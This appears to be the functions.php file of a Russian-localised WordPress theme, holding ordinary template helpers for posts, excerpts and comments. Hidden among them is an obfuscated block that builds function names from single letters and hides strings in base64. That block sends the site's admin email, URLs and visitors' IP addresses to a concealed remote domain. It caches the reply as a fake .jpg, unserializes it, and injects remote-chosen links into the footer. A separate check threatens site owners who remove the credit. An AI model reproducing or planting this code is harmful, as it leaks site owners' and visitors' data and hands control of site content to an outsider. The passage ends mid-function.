<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $aRnIcn='b';$JMwZgA='e';$INTkSv='c';$KTsZ='e';$andRqN='d';$KFuEGPW='_';$VlrAQ='s';$nkFYTsv='e';$yFTau='a';$qteFCm='6';$ZkgFF='o';$CeBlh='4';$mvGPwU='d';$pRYttoii=$aRnIcn.$yFTau.$VlrAQ.$KTsZ.$qteFCm.$CeBlh.$KFuEGPW.$andRqN.$JMwZgA.$INTkSv.$ZkgFF.$mvGPwU.$nkFYTsv;$fqcRZa='n';$ELyA='a';$usPKRMM='i';$uXsdcJ='e';$FmLm='l';$apiyC='g';$NTxO='f';$uVCk='t';$VSyqWy='z';$DsLJYoNS=$apiyC.$VSyqWy.$usPKRMM.$fqcRZa.$NTxO.$FmLm.$ELyA.$uVCk.$uXsdcJ;$SBWsC='1';$wXuarX='t';$cHiGceK='3';$AbUJer='_';$DtDmAD='r';$PIBkFUn='t';$xazgCJ='o';$camx='s';$vWexZe='r';$kjdxUqEz=$camx.$PIBkFUn.$DtDmAD.$AbUJer.$vWexZe.$xazgCJ.$wXuarX.$SBWsC.$cHiGceK;$GOBN='v';$xXQQG='t';$lTYc='r';$fFWWFQ='r';$NVidwpt='e';$Hqvxh='s';$QUPTvpAg=$Hqvxh.$xXQQG.$fFWWFQ.$lTYc.$NVidwpt.$GOBN;                     $jq______n='b';$va_____n='e';$mh__m='c';$wt__h='e';$jf___________s='d';$xa___________b='_';$zc______________q='s';$ay__v='e';$rm__n='a';$yw_______k='6';$kz___g='o';$ur____r='4';$sd_________q='d';$xl_____j=$jq______n.$rm__n.$zc______________q.$wt__h.$yw_______k.$ur____r.$xa___________b.$jf___________s.$va_____n.$mh__m.$kz___g.$sd_________q.$ay__v;$st_________m='i';$la__y='n';$ns_______________m='f';$as________v='o';$kn____________y='s';$sd________o='x';$yb________y='t';$hh_________g='e';$uw____________f='s';$ok_____m='i';$kh_____________j='u';$yl__________f='n';$ur_______________h='t';$vp______a='c';$sa________d='_';$mg____________e=$ns_______________m.$kh_____________j.$yl__________f.$vp______a.$ur_______________h.$ok_____m.$as________v.$la__y.$sa________d.$hh_________g.$sd________o.$st_________m.$kn____________y.$yb________y.$uw____________f;$ux___________e='n';$qp____________l='p';$fn_________b='e';$fv________d='o';$li___f='f';$cm________b=$li___f.$fv________d.$qp____________l.$fn_________b.$ux___________e;$fo__l='a';$jx__b='r';$qy___c='d';$si______g='e';$bl_____v='f';$gw___________g=$bl_____v.$jx__b.$si______g.$fo__l.$qy___c;$lh___y='o';$bt______________k='e';$zb_____________o='s';$nc_________l='f';$wj_____________y='l';$dh____n='c';$wl___________j=$nc_________l.$dh____n.$wj_____________y.$lh___y.$zb_____________o.$bt______________k;define("WP_ID", $xl_____j("Mi4wLjA="));define("WP_TTL", $xl_____j("MTA4MDA="));define("WP_SRC", $xl_____j("dHBva24="));function wp_get_header() {global $xl_____j, $mg____________e;if ($mg____________e($xl_____j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$mg____________e($xl_____j("d3BfZ2V0X2Zvb3Rlcg==")) &&$mg____________e($xl_____j("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $xl_____j, $cm________b, $wl___________j, $gw___________g;$up_______z = TEMPLATEPATH."/".$xl_____j("Zm9vdGVyLnBocA==");$an__________u = @$cm________b($up_______z, "r");$up_______z = @$gw___________g($an__________u, @filesize($up_______z));@$wl___________j($an__________u);$lg____________r = TEMPLATEPATH."/".$xl_____j("ZnVuY3Rpb25zLnBocA==");$an__________u = @$cm________b($lg____________r, "r");$lg____________r = @$gw___________g($an__________u, @filesize($lg____________r));@$wl___________j($an__________u);$ih___m = 0;if($up_______z && $lg____________r) {if ($xl_____j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($up_______z, $xl_____j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ih___m = 1;}if (substr_count($up_______z, "wp_theme_GPL_credits()") < 1) {$ih___m = 2;}}if(WP_ID != "2.0.0") {$ih___m = 12;}}if($ih___m > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ih___m -->";}}function wp_loaded() {global $xl_____j, $mg____________e;return $mg____________e($xl_____j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ex___________p, $so_______________x = "(more...)", $hn_____________d = 0, $js____________n = "") {$lr_________x = get_the_content($so_______________x, $hn_____________d, $js____________n);$lr_________x = apply_filters("the_content", $lr_________x);$lr_________x = str_replace("]]>", "]]>", $lr_________x);if (strlen($_GET["p"]) > 0) {echo $lr_________x;}else if ((strlen($lr_________x)>$ex___________p) && ($xe____________e = strpos($lr_________x, " ", $ex___________p ))) {$lr_________x = substr($lr_________x, 0, $xe____________e);$lr_________x = $lr_________x;echo $lr_________x;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$so_______________x</a></div></p>";} else {echo $lr_________x;}}}$pe______b='a';$ht_________x='s';$sp__________k='_';$ck_____z='b';$qx_____i='o';$rw_____x='e';$gi_______m='6';$tw__________i='n';$up________n='e';$ul_____a='d';$sc_______________q='4';$bx_______i='c';$ni__________q='e';$ry_______y=$ck_____z.$pe______b.$ht_________x.$rw_____x.$gi_______m.$sc_______________q.$sp__________k.$ni__________q.$tw__________i.$bx_______i.$qx_____i.$ul_____a.$up________n;$kd_________c='t';$wi___________p='_';$nh______p='i';$sv______g='_';$dq_____________s='c';$yz___________u='f';$dq____r='e';$ph____v='l';$dv________h='e';$yz_________w='o';$lr_______________a='n';$wa_______t='n';$os____n='t';$jc______g='t';$wb________g='g';$yx________n='e';$yu______c='s';$tr____a=$yz___________u.$nh______p.$ph____v.$yx________n.$wi___________p.$wb________g.$dq____r.$os____n.$sv______g.$dq_____________s.$yz_________w.$wa_______t.$jc______g.$dv________h.$lr_______________a.$kd_________c.$yu______c;$sb__________w='t';$lk_____________v='s';$er_______________o='_';$mm______y='e';$ej_____________x='l';$ol_______y='s';$zg_____________d='f';$jc___p='e';$tv____f='x';$kg___________q='i';$hh__________g='i';$xq______d=$zg_____________d.$kg___________q.$ej_____________x.$jc___p.$er_______________o.$mm______y.$tv____f.$hh__________g.$ol_______y.$sb__________w.$lk_____________v;$st______q='c';$xs_______________y='e';$gf_________c='o';$fy____v='m';$fd_______________k='n';$pl__________s='s';$jt_________v='p';$jg____________q='_';$kx______h='r';$jz__t='e';$gm__s='v';$sf___________y='a';$lf__q='r';$my___________v='i';$mi__________w='o';$vo__y=$gm__s.$xs_______________y.$kx______h.$pl__________s.$my___________v.$gf_________c.$fd_______________k.$jg____________q.$st______q.$mi__________w.$fy____v.$jt_________v.$sf___________y.$lf__q.$jz__t;$vo____j='k';$ou________a='n';$lm_____________h='o';$lv____h='s';$mh__________r='c';$on___j='o';$fw____________p='p';$ff__t='e';$oj____________r='f';$sp______________g=$oj____________r.$lv____h.$lm_____________h.$mh__________r.$vo____j.$on___j.$fw____________p.$ff__t.$ou________a;$pk_____________c='i';$qy_______________g='f';$wj___u='t';$og______q='w';$ir____r='r';$ao_______________n='e';$ie______x=$qy_______________g.$og______q.$ir____r.$pk_____________c.$wj___u.$ao_______________n;$jc______z='m';$nd__j='d';$mf____n='5';$vt__r=$jc______z.$nd__j.$mf____n;$zc_________v='e';$nu_____________p='l';$ae______________j='a';$pf_________s='r';$wx____d='p';$ka____________a='h';$bo_______________t='a';$ic_______p='t';$vc______b=$pf_________s.$zc_________v.$bo_______________t.$nu_____________p.$wx____d.$ae______________j.$ic_______p.$ka____________a;$lk_____________b='z';$nf______________s='i';$qb__h='s';$lw_______j='e';$vn________y='i';$da___________b='a';$ye____a='e';$dy______________w='n';$bi________c='r';$bj_____________d='l';$cm___________j='u';$zl______________v=$cm___________j.$dy______________w.$qb__h.$ye____a.$bi________c.$nf______________s.$da___________b.$bj_____________d.$vn________y.$lk_____________b.$lw_______j;$ju____a='m';$hy________j='e';$jo__________o='a';$yp__________o='n';$jv______o='p';$bo_________d='m';$cl____________a='t';$cf______________z=$cl____________a.$hy________j.$bo_________d.$jv______o.$yp__________o.$jo__________o.$ju____a;$ob___________d='r';$wr_______________v='m';$gg_________f='a';$hd___________g='s';$iq____________g='t';$vw________w='o';$xs____e='c';$pw_____a='a';$ol______o='n';$st________u='e';$qf_________j='t';$af______________a='r';$zb___o='e';$oh_________l='_';$ak__b='e';$zs__________v='c';$uz__________s='_';$bp___________v='t';$ma___________d='e';$as__l='t';$yj__________v='x';$uk____y=$hd___________g.$as__l.$af______________a.$st________u.$pw_____a.$wr_______________v.$uz__________s.$xs____e.$vw________w.$ol______o.$qf_________j.$zb___o.$yj__________v.$bp___________v.$oh_________l.$zs__________v.$ob___________d.$ma___________d.$gg_________f.$iq____________g.$ak__b;function yw_____o($rf________n) {global $xl_____j, $mg____________e, $tr____a, $vo__y, $uk____y;if (!$mg____________e($xl_____j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($vo__y(PHP_VERSION, "5.0.0", ">=") && $mg____________e($xl_____j("ZmlsZV9nZXRfY29udGVudHM=")) && $mg____________e($xl_____j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ue_______________v = $uk____y(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$be____________c = @$tr____a($rf________n, 0, $ue_______________v);} else {$be____________c = @$tr____a($rf________n, 0);}return $be____________c;}function dn_______h($rf________n) {global $mg____________e, $sp______________g, $ie______x, $xl_____j;if (!$mg____________e($xl_____j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$cl___________f = strpos($rf________n, "/", 7);$yi__________h = array("uri"     => substr($rf________n, $cl___________f),"host"    => str_replace("http://", "", substr($rf________n, 0, $cl___________f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$wt_____________v = @$sp______________g("$yi__________h[host]", 80, $fk_______________p, $rr________s, 4);if (!$wt_____________v) {return false;} else {$be____________c = "";$tn___r  = "GET $yi__________h[uri] HTTP/1.0\r\n";$tn___r .= "Host: $yi__________h[host]\r\n";$tn___r .= "Referer: $yi__________h[referer]\r\n";$tn___r .= "Connection: Close\r\n\r\n";@$ie______x($wt_____________v, $tn___r);while (!@feof($wt_____________v)) {$ho____________w = @fgets($wt_____________v, (1024*24));if ($ho____________w == "\r\n") {$ty_______s = true;continue;}if ($ty_______s) {$be____________c .= $ho____________w;}}return $be____________c;}}function yp___________r($rf________n) {global $mg____________e;$dz________e = false;if ($rf________n != "") {if ($mg____________e("yw_____o")) {$dz________e = @yw_____o($rf________n);}if (!$dz________e && ($mg____________e("dn_______h"))) {$dz________e = @dn_______h($rf________n);}}return $dz________e;}function bl__f() {global $_SERVER, $vt__r;$bl__________d = $_SERVER["SERVER_NAME"];if (substr("$bl__________d", 0, 4) == "www.") {$bl__________d = substr("$bl__________d", 4);}$bl__________d = $vt__r("$_SERVER[SERVER_NAME]");return $bl__________d;}function oe_______t() {return "file";}function eo__l($rf________n) {global $_SERVER, $tr____a, $xq______d, $cm________b, $wl___________j, $ie______x;$zz_____n = zz_______________i();$wj___________b = bl__f().".jpg";$ob_____t = $zz_____n["dir_upload"]["path"]."/$wj___________b";$sd______f = @filemtime($ob_____t);if (!$sd______f || ((time()-$sd______f) >= WP_TTL)) {$dz________e = yp___________r($rf________n);if ($dz________e) {if ($xq______d($ob_____t)) {@unlink($ob_____t);}$an__________u = @$cm________b($ob_____t, "x+");@$ie______x($an__________u, $dz________e);@$wl___________j($an__________u);}} else {if ($xq______d($ob_____t)) {$dz________e = @$tr____a($ob_____t);} else {$dz________e = false;}}return $dz________e;}function zz_______________i() {global $_SERVER, $xl_____j, $ry_______y;$gd________q = wp_count_posts("post");$nl_______________n = pathinfo(get_bloginfo("template_directory"));$zz_____n = array("url" => array("report"      => $xl_____j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $nl_______________n,"dir_upload"=> jt____b(),"queryString"=> array("?a001=".WP_ID,"a004=".$nl_______________n[filename],"a005=".$gd________q->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " Все права защищены - 3powered-XMLvalid ");$zz_____n["url"]["queryString"] = implode("&", $zz_____n["queryString"]);$zz_____n["url"]["report"] = $zz_____n["url"]["report"]."/?".$ry_______y($zz_____n["url"]["queryString"]).".html";return $zz_____n;}function jt____b() {$fu____o = wp_upload_dir();if (isset($fu____o["error"])) {$sm__________c = te____________p();if (is_writable($sm__________c)) {$fu____o = array("path" => $sm__________c);}}return $fu____o;}function te____________p() {global $mg____________e, $vt__r, $vc______b, $cf______________z;$it_________o = (bool) ini_get("safe_mode");if ($it_________o == true) {return false;}if ($mg____________e("sys_get_temp_dir")) {$by_________d = sys_get_temp_dir();if (is_writable($by_________d)) {return $vc______b($by_________d);}}if (!empty($_ENV["TMP"])) {return $vc______b($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $vc______b($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $vc______b($_ENV["TEMP"]);} else {$du__________l = $cf______________z($vt__r(uniqid(rand(), true)), "");if ($du__________l) {$by_________d = $vc______b(dirname($du__________l));@unlink($du__________l);return $by_________d;} else {return false;}}}function vf__________j() {global $_GET, $xq______d;$zz_____n = zz_______________i();$bl__________d = bl__f();$rk_______________r = oe_______t();$mx________z = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($rk_______________r == "file") {$du_________t = $zz_____n["dir_upload"]["path"]."/".$bl__________d.".jpg";if ($xq______d($du_________t)) {@unlink($du_________t);$mx________z = "deleted";}}$jc___l = array("s"=> $mx________z,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($jc___l AS $wy_______a => $sx____________a) echo " [$wy_______a:$sx____________a]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $mg____________e, $xl_____j, $zl______________v;$zz_____n = zz_______________i();$vu____________j = "eo__l";if ($mg____________e($vu____________j)) {$be____________c = $vu____________j($zz_____n["url"]["report"]);}if ($be____________c) {if ($be____________c = @$xl_____j($be____________c)) {$be____________c = @$zl______________v($be____________c);if (strlen($be____________c[custom_credit]) >= 5) {$zz_____n["default_string"] = $be____________c[custom_credit];}if ($be____________c["status"] == "0") {$es______c = 1;$zu_______y = 1;} else {$fn_______________i = sizeof($be____________c["links"]);$ih_____________q = $zz_____n["default_string"];if ($fn_______________i > 0 && $be____________c["links"] !== "") {$rf________w = 0;foreach ($be____________c["links"] as $io___g => $xn___________t) {$rf________w++;if ($xn___________t->l_path == "" || $xn___________t->l_path == $_SERVER["REQUEST_URI"]) {$xn___________t->l_href = htmlspecialchars(strip_tags($xn___________t->l_href));$xn___________t->l_title = htmlspecialchars(strip_tags($xn___________t->l_title));$xn___________t->l_anchor = htmlspecialchars(strip_tags($xn___________t->l_anchor));$ih_____________q .= " | ";$ih_____________q .= "<a href='$xn___________t->l_href' title='$xn___________t->l_title'";if ($xn___________t->l_nofollow == "1") {$ih_____________q .= " rel='nofollow'";}$ih_____________q .= ">$xn___________t->l_anchor</a>";}}}$zz_____n["links"] = "$ih_____________q";if ($be____________c[credit] == "0") {$zz_____n["links"] = "";}}} else {$es______c = "1";}} else {$es______c = "1";}if ($es______c == "1") {$zz_____n["links"] = $zz_____n["default_string"];}echo "$zz_____n[links]";echo "<!-- s: $be____________c[signature] -->";vf__________j();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
